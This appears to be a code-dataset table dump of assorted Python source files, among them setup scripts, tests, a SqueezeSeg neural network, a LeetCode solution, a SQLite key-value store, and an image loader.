ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | b403f8f30443122420958d94acb73da7d187f74d | #!/usr/bin/env python
import os
import sys
if sys.version_info < (3, 6):
print('Error: dbt does not support this version of Python.')
print('Please upgrade to Python 3.6 or higher.')
sys.exit(1)
from setuptools import setup
try:
from setuptools import find_namespace_packages
except ImportError:
# the user has a downlevel version of setuptools.
print('Error: dbt requires setuptools v40.1.0 or higher.')
print('Please upgrade setuptools with "pip install --upgrade setuptools" '
'and try again')
sys.exit(1)
package_name = "dbt-bigquery"
package_version = "0.20.0b1"
description = """The bigquery adapter plugin for dbt (data build tool)"""
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, 'README.md')) as f:
long_description = f.read()
setup(
name=package_name,
version=package_version,
description=description,
long_description=long_description,
long_description_content_type='text/markdown',
author="Fishtown Analytics",
author_email="[email protected]",
url="https://github.com/fishtown-analytics/dbt",
packages=find_namespace_packages(include=['dbt', 'dbt.*']),
package_data={
'dbt': [
'include/bigquery/dbt_project.yml',
'include/bigquery/sample_profiles.yml',
'include/bigquery/macros/*.sql',
'include/bigquery/macros/**/*.sql',
]
},
install_requires=[
'dbt-core=={}'.format(package_version),
'protobuf>=3.13.0,<4',
'google-cloud-core>=1.3.0,<2',
'google-cloud-bigquery>=1.25.0,<3',
'google-api-core>=1.16.0,<2',
'googleapis-common-protos>=1.6.0,<2',
'six>=1.14.0',
],
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: Apache Software License',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
python_requires=">=3.6.2",
)
|
py | b403f90408b697f0d94ea1f3c1caf36659c41ef0 | """
qc0.scope
=========
This module describes query scoping.
"""
from __future__ import annotations
from typing import Dict, Tuple, Callable, Any, Union
from functools import singledispatch
from enum import IntEnum
import sqlalchemy as sa
from .base import Struct
from .syntax import Field
class Cardinality(IntEnum):
ONE = 1
SEQ = 2
def __mul__(self, o: Cardinality):
assert isinstance(o, Cardinality)
return self if self >= o else o
class Scope(Struct):
pass
class EmptyScope(Scope):
""" There's nowhere to navigate from this point."""
class UnivScope(Scope):
"""
A universe/initial scope.
One can navigate to any db tables from this point.
"""
tables: Dict[str, sa.Table]
class TableScope(Scope):
"""
A table scope.
One can navigate to any of the table columns, fk relationships and reverse
fk relationships.
"""
rel: Any
table: sa.Table
@property
def foreign_keys(self):
return {fk.column.table.name: fk for fk in self.table.foreign_keys}
@property
def rev_foreign_keys(self):
# TODO(andreypopp): this is silly to do on each lookup, we should
# organize this better
return {
fk.parent.table.name: fk
for t in self.table.metadata.tables.values()
for fk in t.foreign_keys
if fk.column.table == self.table
}
def __yaml__(self):
return {"table": str(self.table.name)}
class RecordScope(Scope):
"""
A scope created by selection.
"""
parent: Any
fields: Dict[str, Field]
def __yaml__(self):
return {"parent": self.parent, "fields": list(self.fields)}
class GroupScope(Scope):
"""
A scope created by grouping.
"""
scope: Scope
fields: Dict[str, Field]
rel: Any
def __yaml__(self):
return {"scope": self.scope, "fields": list(self.fields)}
class SyntheticScope(Scope):
"""
Base class for synthetic scopes.
Such scopes are "synthetic" in a sense that there's no "physical" structure
behind them, instead they are being computed by queries.
"""
def lookup(self, name) -> Tuple[Scope, Callable[Any, Any]]:
"""
Lookup ``name`` in the scope.
The return value is a tuple of the next scope (it's valid to be
``EmptyScope``) and a function which computes the value in
``sqlalchemy`` terms.
"""
raise NotImplementedError() # pragma: no cover
class JsonScope(SyntheticScope):
"""
Scope for JSON values.
It allows to traverse JSON values using PostgreSQL's ``->`` operator.
"""
def lookup(self, name):
return lambda expr, _args: expr[name], sa.dialects.postgresql.JSONB()
class DateScope(SyntheticScope):
"""
Scope for date values.
It destructures any date into ``year``, ``month`` and ``day`` integers.
"""
def lookup(self, name):
if name not in {"year", "month", "year"}:
raise LookupError(name)
return lambda expr, _args: sa.extract(name, expr), sa.Integer()
@singledispatch
def type_scope(_: sa.Type) -> Union[Scope, SyntheticScope]:
""" Describe scope for a specified type. """
return EmptyScope()
@type_scope.register
def Date_scalar_scope(_: sa.Date):
return DateScope()
@type_scope.register
def Json_scalar_scope(_: sa.dialects.postgresql.JSONB):
return JsonScope()
|
py | b403f97597379f78f758cd31af8c56a3a3327352 | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Autogenerated by Thrift Compiler (0.9.3)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:utf8strings
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
|
py | b403fa11c1eeffad1ba6aa74944a496e504ca279 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from os.path import realpath
import pytest
from hydra._internal.config_search_path import ConfigSearchPath, SearchPath
from hydra._internal.utils import compute_search_path_dir
def create_search_path(base_list):
csp = ConfigSearchPath()
csp.config_search_path = [SearchPath(x[0], x[1]) for x in base_list]
return csp
def to_tuples_list(search_path):
return [(x.provider, x.path) for x in search_path.config_search_path]
@pytest.mark.parametrize(
"input_list, reference, expected_idx",
[
([], ("", ""), -1),
([("a", "10")], ("a", None), 0),
([("a", "10"), ("b", "20"), ("a", "30")], ("a", None), 2),
([("a", "10"), ("b", "20"), ("a", "30")], ("b", None), 1),
([("a", "10"), ("b", "20"), ("a", "30")], ("a", "10"), 0),
],
)
def test_find_last_match(input_list, reference, expected_idx):
csp = create_search_path(input_list)
assert csp.find_last_match(SearchPath(reference[0], reference[1])) == expected_idx
@pytest.mark.parametrize(
"input_list, reference, expected_idx",
[
([], ("", ""), -1),
([("a", "10")], ("a", None), 0),
([("a", "10"), ("b", "20"), ("a", "30")], ("a", None), 0),
([("a", "10"), ("b", "20"), ("a", "30")], ("b", None), 1),
([("a", "10"), ("b", "20"), ("a", "30")], ("a", "10"), 0),
],
)
def test_find_first_match(input_list, reference, expected_idx):
csp = create_search_path(input_list)
sp = SearchPath(reference[0], reference[1])
assert csp.find_first_match(sp) == expected_idx
@pytest.mark.parametrize(
"base_list, provider, path, anchor_provider, result_list",
[
# appending to an empty list
([], "foo", "/path", None, [("foo", "/path")]),
# appending to a non empty list
([("f1", "/p1")], "f2", "/p2", None, [("f1", "/p1"), ("f2", "/p2")]),
# appending after an anchor at index 0
(
[("f1", "A"), ("f2", "B")],
"f3",
"B",
SearchPath(None, "A"),
[("f1", "A"), ("f3", "B"), ("f2", "B")],
),
# appending after an anchor at the end of the list
(
[("f1", "A"), ("f2", "B")],
"f3",
"B",
SearchPath(None, "B"),
[("f1", "A"), ("f2", "B"), ("f3", "B")],
),
# appending after a non existent anchor
(
[],
"new_provider",
"/path",
"unregister_provider",
[("new_provider", "/path")],
),
],
)
def test_append(base_list, provider, path, anchor_provider, result_list):
csp = create_search_path(base_list)
csp.append(provider=provider, path=path, anchor=anchor_provider)
assert to_tuples_list(csp) == result_list
@pytest.mark.parametrize(
"base_list, provider, path, anchor_provider, result_list",
[
# prepending to an empty list
([], "foo", "/path", None, [("foo", "/path")]),
# prepending to a full list
(
[("foo", "/path")],
"foo2",
"/path2",
None,
[("foo2", "/path2"), ("foo", "/path")],
),
# prepending in front of an anchor at index 0
(
[("foo", "/path")],
"foo2",
"/path2",
SearchPath("foo", "/path"),
[("foo2", "/path2"), ("foo", "/path")],
),
# prepending in front of an anchor at index 1
(
[("foo", "/path"), ("foo2", "/path2")],
"foo3",
"/path3",
SearchPath("foo2", "/path2"),
[("foo", "/path"), ("foo3", "/path3"), ("foo2", "/path2")],
),
# prepending in front of a none existing anchor results in prepending to the head of the list
([], "foo2", "/path2", "does not exist", [("foo2", "/path2")]),
],
)
def test_prepend(base_list, provider, path, anchor_provider, result_list):
csp = create_search_path(base_list)
csp.prepend(provider=provider, path=path, anchor=anchor_provider)
assert to_tuples_list(csp) == result_list
@pytest.mark.parametrize(
"calling_file, calling_module, config_dir, expected",
[
("foo.py", None, None, realpath("")),
("foo/bar.py", None, None, realpath("foo")),
("foo/bar.py", None, "conf", realpath("foo/conf")),
("foo/bar.py", None, "../conf", realpath("conf")),
("c:/foo/bar.py", None, "conf", realpath("c:/foo/conf")),
("c:/foo/bar.py", None, "../conf", realpath("c:/conf")),
# short module name, keep it to avoid empty module error
(None, "module", None, "pkg://module"),
(None, "package.module", None, "pkg://package"),
(None, "package.module", "conf", "pkg://package/conf"),
# This is an unusual one. this behavior is intentional.
(None, "package.module", "../conf", "pkg://conf"),
(None, "package1.package2.module", "../conf", "pkg://package1/conf"),
# prefer package
("foo", "package1.package2.module", "../conf", "pkg://package1/conf"),
],
)
def test_compute_search_path_dir(calling_file, calling_module, config_dir, expected):
res = compute_search_path_dir(calling_file, calling_module, config_dir)
assert res == expected
|
py | b403fa64c940012e933476d92617e1f28bc44fb1 | from fastapi import FastAPI
from fastapi.testclient import TestClient
app = FastAPI(swagger_ui_oauth2_redirect_url=None)
@app.get("/items/")
async def read_items():
return {"id": "foo"}
client = TestClient(app)
def test_swagger_ui():
response = client.get("/docs")
assert response.status_code == 200
assert response.headers["content-type"] == "text/html; charset=utf-8"
assert "swagger-ui-dist" in response.text
print(client.base_url)
assert "oauth2RedirectUrl" not in response.text
def test_swagger_ui_no_oauth2_redirect():
response = client.get("/docs/oauth2-redirect")
assert response.status_code == 404
def test_response():
response = client.get("/items/")
assert response.json() == {"id": "foo"}
|
py | b403fb1917176b437dbe924a0d22246278ff8e76 | #-*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2019, FPAI
# Copyright (c) 2019, SeriouslyHAO
# Copyright (c) 2019, xcj2019
# Copyright (c) 2019, Leonfirst
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import joblib
import numpy as np
import tensorflow as tf
from squeezeseg.nn_skeleton import ModelSkeleton
class SqueezeSeg(ModelSkeleton):
def __init__(self, mc, gpu_id=0):
with tf.device('/gpu:{}'.format(gpu_id)):
ModelSkeleton.__init__(self, mc)
self._add_forward_graph() # SqueezeNet Model
self._add_output_graph() # pred_prob, pred_cls
self._add_loss_graph() # cls_loss, total_loss
self._add_train_graph() #
self._add_viz_graph() # label_to_show, depth_image_to_show, pred_image_to_show
self._add_summary_ops() #
def _add_forward_graph(self):
"""NN architecture."""
mc = self.mc
if mc.LOAD_PRETRAINED_MODEL:
assert tf.gfile.Exists(mc.PRETRAINED_MODEL_PATH), \
'Cannot find pretrained model at the given path:' \
' {}'.format(mc.PRETRAINED_MODEL_PATH)
self.caffemodel_weight = joblib.load(mc.PRETRAINED_MODEL_PATH)
conv1 = self._conv_layer(
'conv1', self.lidar_input, filters=64, size=3, stride=2,
padding='SAME', freeze=False, xavier=True)
conv1_skip = self._conv_layer(
'conv1_skip', self.lidar_input, filters=64, size=1, stride=1,
padding='SAME', freeze=False, xavier=True)
pool1 = self._pooling_layer(
'pool1', conv1, size=3, stride=2, padding='SAME')
fire2 = self._fire_layer(
'fire2', pool1, s1x1=16, e1x1=64, e3x3=64, freeze=False)
fire3 = self._fire_layer(
'fire3', fire2, s1x1=16, e1x1=64, e3x3=64, freeze=False)
pool3 = self._pooling_layer(
'pool3', fire3, size=3, stride=2, padding='SAME')
fire4 = self._fire_layer(
'fire4', pool3, s1x1=32, e1x1=128, e3x3=128, freeze=False)
fire5 = self._fire_layer(
'fire5', fire4, s1x1=32, e1x1=128, e3x3=128, freeze=False)
pool5 = self._pooling_layer(
'pool5', fire5, size=3, stride=2, padding='SAME')
fire6 = self._fire_layer(
'fire6', pool5, s1x1=48, e1x1=192, e3x3=192, freeze=False)
fire7 = self._fire_layer(
'fire7', fire6, s1x1=48, e1x1=192, e3x3=192, freeze=False)
fire8 = self._fire_layer(
'fire8', fire7, s1x1=64, e1x1=256, e3x3=256, freeze=False)
fire9 = self._fire_layer(
'fire9', fire8, s1x1=64, e1x1=256, e3x3=256, freeze=False)
# Deconvolation
fire10 = self._fire_deconv(
'fire_deconv10', fire9, s1x1=64, e1x1=128, e3x3=128, factors=[1, 2],
stddev=0.1)
fire10_fuse = tf.add(fire10, fire5, name='fure10_fuse')
fire11 = self._fire_deconv(
'fire_deconv11', fire10_fuse, s1x1=32, e1x1=64, e3x3=64, factors=[1, 2],
stddev=0.1)
fire11_fuse = tf.add(fire11, fire3, name='fire11_fuse')
fire12 = self._fire_deconv(
'fire_deconv12', fire11_fuse, s1x1=16, e1x1=32, e3x3=32, factors=[1, 2],
stddev=0.1)
fire12_fuse = tf.add(fire12, conv1, name='fire12_fuse')
fire13 = self._fire_deconv(
'fire_deconv13', fire12_fuse, s1x1=16, e1x1=32, e3x3=32, factors=[1, 2],
stddev=0.1)
fire13_fuse = tf.add(fire13, conv1_skip, name='fire13_fuse')
drop13 = tf.nn.dropout(fire13_fuse, self.keep_prob, name='drop13')
conv14 = self._conv_layer(
'conv14_prob', drop13, filters=mc.NUM_CLASS, size=3, stride=1,
padding='SAME', relu=False, stddev=0.1)
bilateral_filter_weights = self._bilateral_filter_layer(
'bilateral_filter', self.lidar_input[:, :, :, :3], # x, y, z
thetas=[mc.BILATERAL_THETA_A, mc.BILATERAL_THETA_R],
sizes=[mc.LCN_HEIGHT, mc.LCN_WIDTH], stride=1)
self.output_prob = self._recurrent_crf_layer(
'recurrent_crf', conv14, bilateral_filter_weights,
sizes=[mc.LCN_HEIGHT, mc.LCN_WIDTH], num_iterations=mc.RCRF_ITER,
padding='SAME')
def _fire_layer(self, layer_name, inputs, s1x1, e1x1, e3x3, stddev=0.001,
freeze=False):
"""Fire layer constructor.
Args:
layer_name: layer name
inputs: input tensor
s1x1: number of 1x1 filters in squeeze layer.
e1x1: number of 1x1 filters in expand layer.
e3x3: number of 3x3 filters in expand layer.
freeze: if true, do not train parameters in this layer.
Returns:
fire layer operation.
"""
sq1x1 = self._conv_layer(
layer_name+'/squeeze1x1', inputs, filters=s1x1, size=1, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
ex1x1 = self._conv_layer(
layer_name+'/expand1x1', sq1x1, filters=e1x1, size=1, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
ex3x3 = self._conv_layer(
layer_name+'/expand3x3', sq1x1, filters=e3x3, size=3, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
return tf.concat([ex1x1, ex3x3], 3, name=layer_name+'/concat')
def _fire_deconv(self, layer_name, inputs, s1x1, e1x1, e3x3,
factors=[1, 2], freeze=False, stddev=0.001):
"""Fire deconvolution layer constructor.
Args:
layer_name: layer name
inputs: input tensor
s1x1: number of 1x1 filters in squeeze layer.
e1x1: number of 1x1 filters in expand layer.
e3x3: number of 3x3 filters in expand layer.
factors: spatial upsampling factors.
freeze: if true, do not train parameters in this layer.
Returns:
fire layer operation.
"""
assert len(factors) == 2,'factors should be an array of size 2'
ksize_h = factors[0] * 2 - factors[0] % 2
ksize_w = factors[1] * 2 - factors[1] % 2
sq1x1 = self._conv_layer(
layer_name+'/squeeze1x1', inputs, filters=s1x1, size=1, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
deconv = self._deconv_layer(
layer_name+'/deconv', sq1x1, filters=s1x1, size=[ksize_h, ksize_w],
stride=factors, padding='SAME', init='bilinear')
ex1x1 = self._conv_layer(
layer_name+'/expand1x1', deconv, filters=e1x1, size=1, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
ex3x3 = self._conv_layer(
layer_name+'/expand3x3', deconv, filters=e3x3, size=3, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
return tf.concat([ex1x1, ex3x3], 3, name=layer_name+'/concat')
|
py | b403fb1f93df8041c138be84a3f923f47505591d | __source__ = 'https://leetcode.com/problems/h-index-ii/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/h-index-ii.py
# Time: O(logn)
# Space: O(1)
#
# Description: Leetcode # 275. H-Index II
#
# Follow up for H-Index: What if the citations array is sorted in
# ascending order? Could you optimize your algorithm?
#
# Hint:
#
# Expected runtime complexity is in O(log n) and the input is sorted.
#
# Companies
# Facebook
# Related Topics
# Binary Search
# Similar Questions
# H-Index
#
import unittest
class Solution(object):
def hIndex(self, citations):
"""
:type citations: List[int]
:rtype: int
"""
n = len(citations)
left, right = 0, n-1
while left <= right:
mid = (left + right) / 2
if citations[mid] >= n - mid:
right = mid - 1
else:
left = mid + 1
return n - left
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
print Solution().containsDuplicate([12344555,12344555])
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
citations[index] >= length(citations) - index
Thought: https://leetcode.com/problems/h-index/tabs/solution
Just binary search, each time check citations[mid]
case 1: citations[mid] == len-mid, then it means there are citations[mid] papers
that have at least citations[mid] citations.
case 2: citations[mid] > len-mid, then it means there are citations[mid] papers
that have moret than citations[mid] citations, so we should continue searching in the left half
case 3: citations[mid] < len-mid, we should continue searching in the right side
After iteration, it is guaranteed that right+1 is the one we need to find
(i.e. len-(right+1) papars have at least len-(righ+1) citations)
1.
# 147ms 8.38%
class Solution {
public int hIndex(int[] citations) {
int result = 0;
for (int i = citations.length - 1; i >= 0; i--) {
result = Math.max(result, Math.min(citations[i], citations.length - i));
}
return result;
}
}
# 8ms 65.84%
class Solution {
public int hIndex(int[] citations) {
for (int i = citations.length - 1; i >= 0; i--) {
if (citations.length - i - 1 >= citations[i]) {
return citations.length - i - 1;
}
}
return citations.length;
}
}
# 6ms 99.08%
class Solution {
public int hIndex(int[] citations) {
if (citations.length == 0) {
return 0;
}
int start = 0;
int end = citations.length - 1;
while (start + 1 < end) {
int mid = start + (end - start) / 2;
if (citations[mid] < citations.length - mid - 1) {
start = mid;
} else if (citations[mid] > citations.length - mid - 1) {
end = mid;
} else {
return citations.length - mid - 1;
}
}
if (citations[end] <= citations.length - end - 1) {
return citations.length - end - 1;
} else if (citations[start] <= citations.length - start - 1) {
return citations.length - start - 1;
} else {
return citations.length;
}
}
}
# 9ms 55.10%
class Solution {
public int hIndex(int[] citations) {
if (citations.length == 0) {
return 0;
}
int start = 0;
int end = citations.length - 1;
int n = citations.length;
while (start <= end) {
int mid = start + (end - start) / 2;
int h = n - mid;
if (citations[mid] == h) {
return h;
} else if (citations[mid] > h) {
end = mid - 1;
} else {
start = mid + 1;
}
}
return n - start;
}
}
3.
I am very sure that two-branch binary search is more efficient than three branch binary search.
and (low + high) is not good idea since it may rely on the overflow behavior.
In fact, using count step first mid is the standard implement way of C++,
so I do not think there are better ways to implement the binary search.
# 6ms 99.08%
class Solution {
public int hIndex(int[] citations) {
int len = citations.length;
int first = 0;
int mid;
int count = len;
int step;
while (count > 0) {
step = count / 2;
mid = first + step;
if (citations[mid] < len - mid) {
first = mid + 1;
count -= (step + 1);
}
else {
count = step;
}
}
return len - first;
}
}
''' |
py | b403fc0cd585e2b192dad2aa4812c7d7b2273fe9 | from typing import Any
import aiosqlite
from maize.util.byte_types import hexstr_to_bytes
from maize.util.db_wrapper import DBWrapper
from maize.util.streamable import Streamable
class KeyValStore:
"""
Multipurpose persistent key-value store
"""
db_connection: aiosqlite.Connection
db_wrapper: DBWrapper
@classmethod
async def create(cls, db_wrapper: DBWrapper):
self = cls()
self.db_wrapper = db_wrapper
self.db_connection = db_wrapper.db
await self.db_connection.execute(
("CREATE TABLE IF NOT EXISTS key_val_store(" " key text PRIMARY KEY," " value text)")
)
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS name on key_val_store(key)")
await self.db_connection.commit()
return self
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM key_val_store")
await cursor.close()
await self.db_connection.commit()
async def get_object(self, key: str, type: Any) -> Any:
"""
Return bytes representation of stored object
"""
cursor = await self.db_connection.execute("SELECT * from key_val_store WHERE key=?", (key,))
row = await cursor.fetchone()
await cursor.close()
if row is None:
return None
return type.from_bytes(hexstr_to_bytes(row[1]))
async def set_object(self, key: str, obj: Streamable):
"""
Adds object to key val store
"""
async with self.db_wrapper.lock:
cursor = await self.db_connection.execute(
"INSERT OR REPLACE INTO key_val_store VALUES(?, ?)",
(key, bytes(obj).hex()),
)
await cursor.close()
await self.db_connection.commit()
|
py | b403fcc500cb37ae89997101e99f088ff61e6ac1 | import sys
from setuptools import setup
from setuptools import find_packages
if sys.version_info[:2] < (3, 6):
raise RuntimeError('cn2an requires Python 3.6 or later')
setup(
name="cn2an",
version="0.5.11",
author="Ailln",
author_email="[email protected]",
url="https://github.com/Ailln/cn2an",
packages=find_packages(),
include_package_data=True,
install_requires=open("./requirements.txt", "r", encoding="utf-8").read().splitlines(),
description="Convert Chinese numerals and Arabic numerals.",
long_description=open("./README.md", "r", encoding="utf-8").read(),
long_description_content_type="text/markdown",
zip_safe=False,
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
]
)
|
py | b403fd12369bf9ac1fa31f1d0e42466e3d20fd71 | if __name__ == "__main__":
import pandas as pd
from key_driver_analysis import relative_importance
df = pd.DataFrame(data={
'age': [40, 50, 60, 10, 20, 30, 7, 80, 90],
'salary': [123, 4423, 56563, 75545, 2345, 2346, 5534, 775, 34345],
'no_of_cars_owned': [1, 3, 4, 2, 1, 3, 5, 3, 2],
'no_of_mobiles_purchased': [10, 3, 5, 65, 34, 6, 21, 76, 9]
})
print(df)
target = 'no_of_mobiles_purchased'
features=set(df.columns.tolist()).difference(set([target]))
print(f'target --> {target}')
print(f'features --> {features}')
rw_df = relative_importance(df,
target=target,
features=features,
verbose=True)
print(rw_df) |
py | b403ff8cc8387935d8ee4e29bf9c022a130c3f47 | # -*- coding: utf-8 -*-
__author__ = "Paul Schifferer <[email protected]>"
"""
"""
from marshmallow import fields
from sweetrpg_library_objects.model.system import System
from sweetrpg_model_core.schema.base import BaseSchema
class SystemSchema(BaseSchema):
model_class = System
game_system = fields.String(required=True) # , load_only=True)
edition = fields.String(required=True) # , load_only=True)
tags = fields.List(fields.Dict(keys=fields.String(required=True), values=fields.String()))
|
py | b403fffd002e5234bdff3319929c5fc1b02fc051 | import torch
from . import Distribution
from .. import util
class Poisson(Distribution):
def __init__(self, rate):
rate = util.to_tensor(rate)
super().__init__(name='Poisson', address_suffix='Poisson', torch_dist=torch.distributions.Poisson(rate))
def __repr__(self):
return 'Poisson(rate: {})'.format(self.rate)
@property
def rate(self):
return self._torch_dist.mean
|
py | b4040020bf71abe53530e89506093f1434b88a87 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import traceback
import warnings
from pants.base.build_environment import get_buildroot, pants_version
from pants.bin.goal_runner import GoalRunner
class _Exiter(object):
def __init__(self):
# Since we have some exit paths that run via the sys.excepthook,
# symbols we use can become garbage collected before we use them; ie:
# we can find `sys` and `traceback` are `None`. As a result we capture
# all symbols we need here to ensure we function in excepthook context.
# See: http://stackoverflow.com/questions/2572172/referencing-other-modules-in-atexit
self._exit = sys.exit
self._format_tb = traceback.format_tb
self._is_print_backtrace = True
def apply_options(self, options):
self._is_print_backtrace = options.for_global_scope().print_exception_stacktrace
def do_exit(self, result=0, msg=None, out=sys.stderr):
if msg:
print(msg, file=out)
self._exit(result)
def exit_and_fail(self, msg=None):
self.do_exit(result=1, msg=msg)
def unhandled_exception_hook(self, exception_class, exception, tb):
msg = ''
if self._is_print_backtrace:
msg = '\nException caught:\n' + ''.join(self._format_tb(tb))
if str(exception):
msg += '\nException message: {}\n'.format(exception)
else:
msg += '\nNo specific exception message.\n'
# TODO(Jin Feng) Always output the unhandled exception details into a log file.
self.exit_and_fail(msg)
def _run(exiter):
# Place the registration of the unhandled exception hook as early as possible in the code.
sys.excepthook = exiter.unhandled_exception_hook
# We want to present warnings to the user, set this up early to ensure all warnings are seen.
# The "default" action displays a warning for a particular file and line number exactly once.
# See https://docs.python.org/2/library/warnings.html#the-warnings-filter for the complete action
# list.
warnings.simplefilter("default")
# The GoalRunner will setup final logging below in `.setup()`, but span the gap until then.
logging.basicConfig()
# This routes the warnings we enabled above through our loggers instead of straight to stderr raw.
logging.captureWarnings(True)
root_dir = get_buildroot()
if not os.path.exists(root_dir):
exiter.exit_and_fail('PANTS_BUILD_ROOT does not point to a valid path: {}'.format(root_dir))
goal_runner = GoalRunner(root_dir)
goal_runner.setup()
exiter.apply_options(goal_runner.options)
result = goal_runner.run()
exiter.do_exit(result)
def main():
exiter = _Exiter()
try:
_run(exiter)
except KeyboardInterrupt:
exiter.exit_and_fail('Interrupted by user.')
if __name__ == '__main__':
main()
|
py | b40400304cc504ceff96dd2911ae645201469277 | """System policies."""
from .const import CAT_ENTITIES, SUBCAT_ALL, POLICY_READ
ADMIN_POLICY = {CAT_ENTITIES: True}
USER_POLICY = {CAT_ENTITIES: True}
READ_ONLY_POLICY = {CAT_ENTITIES: {SUBCAT_ALL: {POLICY_READ: True}}}
|
py | b404003fb5d530f43c842556f1a72894c3d693a5 | """Intro1ClassWork URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path , include
urlpatterns = [
path('',include('artistRecord.urls')), # made it so you don't have to test against an empty route match only for less code
path('music/',include('artistRecord.urls')),
path('admin/', admin.site.urls)
]
|
py | b4040091a3a176ca6356f039e363b93aeaeb4e2d | # SPDX-FileCopyrightText: 2018 Scott Shawcroft for Adafruit Industries
# SPDX-FileCopyrightText: Matt Land
# SPDX-FileCopyrightText: Brooke Storm
# SPDX-FileCopyrightText: Sam McGahan
#
# SPDX-License-Identifier: MIT
"""
`adafruit_imageload.pnm.ppm_ascii`
====================================================
Load pixel values (indices or colors) into a bitmap and for an ascii ppm,
return None for pallet.
* Author(s): Matt Land, Brooke Storm, Sam McGahan
"""
__version__ = "0.13.2"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_ImageLoad.git"
def load(file, width, height, bitmap=None, palette=None):
"""
:param stream file: infile with the position set at start of data
:param int width:
:param int height:
:param int max_colors: color space of file
:param bitmap: displayio.Bitmap class
:param palette: displayio.Palette class
:return tuple:
"""
palette_colors = set()
data_start = file.tell()
for triplet in read_three_colors(file):
palette_colors.add(triplet)
if palette:
palette = palette(len(palette_colors))
for counter, color in enumerate(palette_colors):
palette[counter] = color
if bitmap:
file.seek(data_start)
bitmap = bitmap(width, height, len(palette_colors))
palette_colors = list(palette_colors)
for y in range(height):
for x in range(width):
for color in read_three_colors(file):
bitmap[x, y] = palette_colors.index(color)
break # exit the inner generator
return bitmap, palette
def read_three_colors(file):
"""
Generator to read integer values from file, in groups of three.
Each value can be len 1-3, for values 0 - 255, space padded.
:return tuple[int]:
"""
triplet = []
color = bytearray()
while True:
this_byte = file.read(1)
if this_byte.isdigit():
color += this_byte
# not a digit means we completed one number (found a space separator or EOF)
elif color or (triplet and this_byte == b""):
triplet.append(int("".join(["%c" % char for char in color])))
color = bytearray()
if len(triplet) == 3: # completed one pixel
yield bytes(tuple(triplet))
triplet = []
# short circuit must be after all other cases, so we yield the last pixel before returning
if this_byte == b"":
return
|
